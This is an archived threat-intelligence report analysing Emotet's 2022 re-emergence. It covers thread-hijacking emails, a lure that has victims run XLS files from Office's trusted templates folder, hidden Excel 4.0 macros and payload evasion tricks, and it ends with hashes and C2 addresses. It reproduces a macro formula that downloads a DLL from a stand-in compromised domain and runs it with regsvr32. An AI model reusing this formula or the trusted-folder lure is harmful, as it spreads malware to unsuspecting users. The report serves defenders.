{
	"id": "ae388efa-1ddf-4be0-9a2b-6db329525bc7",
	"created_at": "2026-04-06T00:14:11.642915Z",
	"updated_at": "2026-04-10T03:22:01.822737Z",
	"deleted_at": null,
	"sha1_hash": "685c58f790f4e06a82c9a962cd9da2e1f823c2e3",
	"title": "Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1786043,
	"plain_text": "Emotet’s Vacation is Over: No Rest for the Wicked | Deep Instinct\r\nBy Simon Kenin, Threat Intelligence Researcher, and Mark Vaitzman, Security and Threat Research Team Leader\r\nPublished: 2022-11-17 · Archived: 2026-04-05 15:49:44 UTC\r\nEmotet is a prolific malware botnet that originally functioned as a banking trojan when it emerged in 2014. It was spread via spam campaigns imitating financial statements, transfers, and payment invoices. Emotet is propagated mostly via Office email attachments containing a macro. If the macro is enabled, it downloads a malicious PE file (Emotet), which is then executed.\r\nThe Emotet operation was disrupted in early 2021, but after a few months of inactivity for what we will call \"summer vacation,\" it has re-emerged with nearly daily activity since mid-October.\r\nFigure 1: Emotet activity showing no new spam from mid-July until the start of November (Source: MalwareBazaar*)\r\nThe first thing the botnet operators did upon re-emergence was update currently infected computers with new versions of the malware:\r\nhttps://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked\r\nPage 1 of 16\n\nFigure 2: Observed initial Emotet activity after vacation (Source: Twitter†)\r\nDelivery via Thread Hijacking Email\r\nThe current wave of Emotet malspam is delivered via “thread hijacking” emails. The attachments come both in password-protected zips and as plain attachments:\r\nFigure 3: Email containing a password-protected zip attachment\r\nFigure 4: Emotet’s malicious Office attachment without a password-protected zip\r\nChanges in Emotet Malspam\r\nBefore going on vacation, Emotet malspam consisted of XLS files with an Excel 4.0 macro. The files contained a simple social engineering image that asks the victim to enable content, which causes the macro to execute:\r\nFigure 5: Emotet XLS file from July (a2daa1b6f2dccc95e9a7d8d89932c7d7936aa2e53bbf4921f81f5b38257d5894)\r\nAfter the vacation ended, the Emotet wave still includes XLS files; however, the social engineering element has changed:\r\nFigure 6: New social engineering lure used by Emotet\r\nThe victim is asked to copy the file to the templates folder of Microsoft Office and execute it from there. Executing Office files from this location bypasses the security warning, and the Excel 4.0 macro is executed automatically when the file is opened:\r\nFigure 7: The templates folder is a trusted location allowing auto-execution of macros\r\nAdvice: Cybersecurity and IT teams should disable trusted locations and/or restrict write access to such locations for unprivileged users, and proactively hunt for suspicious executions from those locations.\r\nBesides this social engineering piece, the techniques used by Emotet didn’t change much. When manually checking the sheets, they look empty; however, they contain hidden values:\r\nFigure 8: “Empty” sheets used by Emotet\r\nThe auto_open macro is also hidden:\r\nFigure 9: Hidden column containing “Auto_Open” macro\r\nThe formula concatenates values from different cells to eventually assemble, download, and execute the Emotet DLL. This is done to avoid static detection by common endpoint solutions.\r\nThe end result should look like this:\r\n=FORMULA(=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"https://compromised_domain/random/path/\",\r\n=FORMULA(=EXEC(\"C:\\Windows\\System32\\regsvr32.exe ..\\oxnv1.ooccxx\"),G18)\r\nThe Emotet Payload\r\nEmotet operations moved from PE32 to PE64 executables in mid-2022, adding several new features and rebuilding some of its older code. The overall structure remained the same.\r\nFigure 10: PE64 new Emotet (DetectItEasy)\r\nFrom the configuration extraction of Emotet we can see the list of malicious IPs, as well as evidence of the use of the epoch4 botnet and the ECDH and ECDSA keys (see the IOC table).\r\nIn an attempt to look like a legitimate application when scanned, Emotet uses C++ libraries licensed by Dinkumware.\r\nFigure 11: Dinkumware C++ library\r\nFigure 12: Dinkumware website (www.dinkumware.com)\r\nAdditionally, Emotet has a few loops to mimic legitimate behavior during runtime, for example “printing benign strings.”\r\nFigure 13: Print benign strings function\r\nIt even builds a Sudoku and checks your board number (not really…).\r\nFigure 14: Benign String\r\nThe Real Emotet Job\r\nThe final DLL is decrypted and loaded into memory during runtime, making investigation and detection more difficult. Even the API call to VirtualAlloc is obfuscated, as in the older version, and the address of the API is retrieved dynamically. The parameters of the call are saved as a STRING and converted to INT during runtime. You can read more on that technique in the previous blog by Deep Instinct.\r\nFigure 15: VirtualAlloc detection evasion\r\nThe payload itself is encrypted and then encoded using base64:\r\nFigure 16: Encrypted payload in base64\r\nOnce the malware is executed, it decodes the base64 text into binary data:\r\nFigure 17: Base64 binary data\r\nThe binary data is then decrypted and we finally get the payload, easily identified by the “MZ… this program cannot be run in DOS mode.” string.\r\nFigure 18: Final payload revealed\r\nSome other artifacts that are similar to the previous generation of Emotet include the following:\r\nEmpty import table\r\nFigure 19: Empty Import table\r\nMinimal informative strings\r\nFigure 20: Strings of the executable file\r\nSimilar code flow flattening technique\r\nFigure 21: Code flow of Emotet\r\nYou can read more about these techniques in Deep Instinct’s previous blog about Emotet.\r\nThe multi-step techniques detailed above result in detection only late, when the decrypted PE is loaded into memory; therefore, we see a low detection rate in VT for the initial DLL, while the decrypted DLL gets a higher detection rate.\r\nFigure 22: Initial Emotet DLL\r\nFigure 23: Final Emotet payload\r\nConclusion\r\nEmotet has returned to send malspam after a few months of summer break.\r\nThe current waves don’t show much change from those before the vacation; they’re still trying to bypass detection by making some minor changes, adding benign code blocks, and moving to PE64.\r\nEmotet has slightly altered its techniques and TTPs over the years as the threat landscape shifts in favor of new initial infection vectors and new bypassing methods.\r\nWe wouldn’t be surprised if we saw Emotet shift from Excel 4.0 macros to another initial infection vector that would yield more successful infections in the near-term future.\r\nDeep Instinct customers are protected from the new Emotet campaign by multiple protection layers, both static and dynamic, resulting in pre-execution prevention.\r\nFigure 24: Static engine prevention for Emotet’s malicious Office file\r\nIOC\r\nType | Password Protected Zip samples | Plain Attachment samples\r\nZIP | 19c43584bd90e6507ba4a4dad59fdf3a | N/A\r\nXLS | e99144862c6a3bb1d25846e962dc1633 | 893f9b10a48073fc3fa0d5c8867f7200\r\nDLL | b0ebf252754995807a8fe9dca7a063b8 | bf488b48716275f2e3dc9efc7fea4aea\r\nDecrypted DLL: 236AE63E2AC25B35EDBCECA4443BD95F\r\nC2:\r\n45.235.8.30:8080\r\n94.23.45.86:4143\r\n119.59.103.152:8080\r\n169.60.181.70:8080\r\n164.68.99.3:8080\r\n172.105.226.75:8080\r\n107.170.39.149:8080\r\n206.189.28.199:8080\r\n1.234.2.232:8080\r\n188.44.20.25:443\r\n186.194.240.217:443\r\n103.43.75.120:443\r\n149.28.143.92:443\r\n159.89.202.34:443\r\n209.97.163.214:443\r\n183.111.227.137:8080\r\n129.232.188.93:443\r\n139.59.126.41:443\r\n110.232.117.186:8080\r\n139.59.56.73:8080\r\n103.75.201.2:443\r\n91.207.28.33:8080\r\n164.90.222.65:443\r\n197.242.150.244:8080\r\n212.24.98.99:8080\r\n51.161.73.194:443\r\n115.68.227.76:8080\r\n159.65.88.10:8080\r\n201.94.166.162:443\r\n95.217.221.146:8080\r\n173.212.193.249:8080\r\n82.223.21.224:8080\r\n103.132.242.26:8080\r\n213.239.212.5:443\r\n153.126.146.25:7080\r\n45.176.232.124:443\r\n182.162.143.56:443\r\n169.57.156.166:8080\r\n159.65.140.115:443\r\n163.44.196.120:8080\r\n172.104.251.154:8080\r\n167.172.253.162:8080\r\n91.187.140.35:8080\r\n45.118.115.99:8080\r\n147.139.166.154:8080\r\n72.15.201.15:8080\r\n149.56.131.28:8080\r\n167.172.199.165:8080\r\n101.50.0.91:8080\r\n160.16.142.56:8080\r\n185.4.135.165:8080\r\n104.168.155.143:8080\r\n79.137.35.198:8080\r\n5.135.159.50:443\r\n187.63.160.88:80\r\nEck1: MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE86M1tQ4uK/Q1Vs0KTCk+fPEQ3cuwTyCz+gIgzky2DB5Elr60DubJW5q9Tr2dj8/gEFs0TIIEJgLTuqzx+58sdg==\r\nEck2: MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEQF90tsTY3Aw9HwZ6N9y5+be9XoovpqHyD6F5DRTl9THosAoePIs/e5AdJiYxhmV8Gq3Zw1ysSPBghxjZdDxY+Q==\r\nReferences\r\n* Figure 1: MalwareBazaar\r\n† Figure 2: Twitter\r\nSource: https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.deepinstinct.com/blog/emotet-vacation-is-over-no-rest-for-the-wicked"
	],
	"report_names": [
		"emotet-vacation-is-over-no-rest-for-the-wicked"
	],
	"threat_actors": [],
	"ts_created_at": 1775434451,
	"ts_updated_at": 1775791321,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.pdf",
		"text": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.txt",
		"img": "https://archive.orkl.eu/685c58f790f4e06a82c9a962cd9da2e1f823c2e3.jpg"
	}
}